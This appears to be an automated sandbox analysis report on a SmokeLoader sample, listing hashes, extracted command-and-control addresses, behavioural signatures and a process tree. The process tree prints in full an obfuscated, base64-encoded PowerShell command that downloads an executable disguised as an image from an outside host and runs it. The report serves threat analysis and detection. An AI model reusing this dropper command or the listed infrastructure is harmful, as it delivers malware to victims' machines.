Analysis
-
max time kernel
101s -
max time network
104s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-04-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win10v20210410
General
-
Target
9fbd32c6bb25f6a660696fa9830c5040.exe
-
Size
847KB
-
MD5
9fbd32c6bb25f6a660696fa9830c5040
-
SHA1
1e41347d36792e823a8982b10170d83a0722e3cc
-
SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
-
SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
Malware Config
Extracted
https://u.teknik.io/28oLW.jpg
Extracted
smokeloader
2018
http://94.140.115.43/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1780 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
eVDwACBtpW.exepid process 1388 eVDwACBtpW.exe -
Loads dropped DLL 2 IoCs
Processes:
powershell.exepid process 1780 powershell.exe 1780 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
eVDwACBtpW.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum eVDwACBtpW.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 eVDwACBtpW.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1168 powershell.exe 1168 powershell.exe 1780 powershell.exe 1780 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
eVDwACBtpW.exepid process 1388 eVDwACBtpW.exe 1388 eVDwACBtpW.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe 1688 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepowershell.exepowershell.exedescription pid process target process PID 1688 wrote to memory of 1168 1688 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1688 wrote to memory of 1168 1688 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1688 wrote to memory of 1168 1688 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1688 wrote to memory of 1168 1688 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 1168 wrote to memory of 1780 1168 powershell.exe powershell.exe PID 1168 wrote to memory of 1780 1168 powershell.exe powershell.exe PID 1168 wrote to memory of 1780 1168 powershell.exe powershell.exe PID 1168 wrote to memory of 1780 1168 powershell.exe powershell.exe PID 1780 wrote to memory of 1388 1780 powershell.exe eVDwACBtpW.exe PID 1780 wrote to memory of 1388 1780 powershell.exe eVDwACBtpW.exe PID 1780 wrote to memory of 1388 1780 powershell.exe eVDwACBtpW.exe PID 1780 wrote to memory of 1388 1780 powershell.exe eVDwACBtpW.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
e76866e9ef9f26f77871223559246bfe
SHA1b8703ee6f7c21bcdc50abb5325c519c4f125b087
SHA2569fffadcdc8c187ba4b43fa16221fe92d7a1912be824606a246696515b5084e92
SHA5126ea0c90503eaf9c0d0a8a895efd7413cc02a5c7d8941e4a0de82b4e7809e5fc6c00c7f787850b54219d16335b98ee2ff023d6349cfae7e6166e0a231a946a03b
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
memory/1168-66-0x0000000004660000-0x0000000004661000-memory.dmpFilesize
4KB
-
memory/1168-63-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/1168-67-0x0000000004890000-0x0000000004891000-memory.dmpFilesize
4KB
-
memory/1168-64-0x00000000048C0000-0x00000000048C1000-memory.dmpFilesize
4KB
-
memory/1168-60-0x0000000000000000-mapping.dmp
-
memory/1168-65-0x00000000048C2000-0x00000000048C3000-memory.dmpFilesize
4KB
-
memory/1168-62-0x0000000000CD0000-0x0000000000CD1000-memory.dmpFilesize
4KB
-
memory/1208-101-0x0000000002C20000-0x0000000002C35000-memory.dmpFilesize
84KB
-
memory/1208-100-0x0000000002AA0000-0x0000000002AA1000-memory.dmpFilesize
4KB
-
memory/1388-97-0x0000000000000000-mapping.dmp
-
memory/1688-59-0x0000000075011000-0x0000000075013000-memory.dmpFilesize
8KB
-
memory/1780-84-0x0000000006120000-0x0000000006121000-memory.dmpFilesize
4KB
-
memory/1780-93-0x0000000006380000-0x0000000006381000-memory.dmpFilesize
4KB
-
memory/1780-94-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1780-92-0x0000000006360000-0x0000000006361000-memory.dmpFilesize
4KB
-
memory/1780-85-0x0000000006170000-0x0000000006171000-memory.dmpFilesize
4KB
-
memory/1780-79-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1780-74-0x0000000002610000-0x000000000325A000-memory.dmpFilesize
12.3MB
-
memory/1780-73-0x0000000002610000-0x000000000325A000-memory.dmpFilesize
12.3MB
-
memory/1780-68-0x0000000000000000-mapping.dmp